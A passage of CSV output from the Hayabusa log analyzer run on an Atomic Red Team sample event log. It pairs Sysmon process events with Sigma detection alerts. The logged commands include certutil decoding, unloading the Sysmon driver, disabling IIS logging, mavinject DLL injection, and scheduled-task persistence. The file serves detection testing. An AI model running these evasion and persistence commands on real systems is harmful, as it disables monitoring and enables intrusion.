747F3D96-DA3F-5D31-0000-0010813E3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6572 | PGUID: 747F3D96-DA40-5D31-0000-00106A543C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.270 
+09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp"" | LID: 0x50951 | PID: 5168 | PGUID: 747F3D96-DA40-5D31-0000-0010B1553C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4336 | PGUID: 747F3D96-DA40-5D31-0000-0010CF5A3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c 
C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt"" | LID: 0x50951 | PID: 3932 | PGUID: 747F3D96-DA40-5D31-0000-0010565D3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Evas,Process Created_Non-Exe Filetype,"Cmd: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | LID: 0x50951 | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00 | Hash: SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_NonExeProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | LID: 0x50951 | PID: 6260 | PGUID: 
747F3D96-DA40-5D31-0000-0010AB5F3C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.600 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.643 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 264 | PGUID: 747F3D96-DA40-5D31-0000-0010E16B3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.715 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3976 | PGUID: 747F3D96-DA4A-5D31-0000-0010C21F3D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.758 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1012 | PGUID: 
747F3D96-DA4A-5D31-0000-0010EE223D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.944 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4056 | PGUID: 747F3D96-DA4A-5D31-0000-00106C293D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.991 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2584 | PGUID: 747F3D96-DA4A-5D31-0000-00107A2C3D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll | Process: C:\Windows\System32\mavinject.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2604 | PGUID: 747F3D96-DA4B-5D31-0000-0010CB413D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,critical,,MavInject Process Injection,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:16.496 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2596 | PGUID: 747F3D96-DA4C-5D31-0000-0010655D3D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:16.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-DA4C-5D31-0000-001077603D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:44.283 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3536 | PGUID: 747F3D96-DA68-5D31-0000-001025713E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.073 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-DA6A-5D31-0000-0010B2953E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management AT | Cmd: at 13:20 /interactive cmd | Process: 
C:\Windows\System32\at.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" | LID: 0x50951 | PID: 3864 | PGUID: 747F3D96-DA6A-5D31-0000-001004983E00 | Hash: SHA1=EC6F04AA61D8F0FA0945EBFC58F6CC7CEBB1377A,MD5=F4416891D11BBA6975E5067FA10507C8,SHA256=73A9A6A4C9CF19FCD117EB3C430E1C9ACADED31B42875BA4F02FA61DA1B8A6DC,IMPHASH=FA9A9B0D471E4B5F3683C346C3D880BD",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,PrivEsc,Interactive AT Job,,../hayabusa-rules/sigma/process_creation/proc_creation_win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.207 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3224 | PGUID: 747F3D96-DA6A-5D31-0000-0010C09D3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.422 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4276 | PGUID: 747F3D96-DA6A-5D31-0000-001072A63E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: SCHTASKS /Create /SC ONCE /TN spawn /TR 
C:\windows\system32\cmd.exe /ST 20:10 | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" | LID: 0x50951 | PID: 1408 | PGUID: 747F3D96-DA6A-5D31-0000-0010C4A83E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.608 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Tasks\spawn | Process: C:\Windows\system32\svchost.exe | PID: 1108 | PGUID: 747F3D96-D4A5-5D31-0000-001037D40000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4552 | PGUID: 747F3D96-DA6A-5D31-0000-001025AD3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.828 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR 
C:\windows\system32\cmd.exe /SC daily /ST 20:10"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3872 | PGUID: 747F3D96-DA6A-5D31-0000-001074C23E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" | LID: 0x50951 | PID: 3352 | PGUID: 747F3D96-DA6A-5D31-0000-0010C5C43E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.927 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 888 | PGUID: 
747F3D96-DA6A-5D31-0000-00104BC83E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:47.218 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5332 | PGUID: 747F3D96-DA6B-5D31-0000-0010CCD03E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:47.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a -c | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-DA6B-5D31-0000-00102DD33E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:50.398 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3316 | PGUID: 747F3D96-DA6E-5D31-0000-0010D8F63E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:50.453 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a Java | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" | LID: 0x50951 | PID: 1284 | PGUID: 
747F3D96-DA6E-5D31-0000-001081F93E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:52.923 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 608 | PGUID: 747F3D96-DA70-5D31-0000-001007293F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:52.982 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a C:\Windows\system32\javacpl.cpl | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" | LID: 0x50951 | PID: 112 | PGUID: 747F3D96-DA70-5D31-0000-00100E2C3F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:53.882 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6168 | PGUID: 747F3D96-DA71-5D31-0000-00101A463F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.099 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1300 | PGUID: 
747F3D96-DA72-5D31-0000-0010044F3F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.129 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-DA72-5D31-0000-001056513F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,low,Evas,Indirect Command Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x50951 | PID: 3160 | PGUID: 747F3D96-DA72-5D31-0000-0010B1543F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:55.069 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1052 | PGUID: 
747F3D96-DA73-5D31-0000-00106A8D3F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:55.138 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe | LID: 0x50951 | PID: 4092 | PGUID: 747F3D96-DA73-5D31-0000-0010918F3F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:55.236 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1724 | PGUID: 747F3D96-DA73-5D31-0000-001061933F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49734 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network 
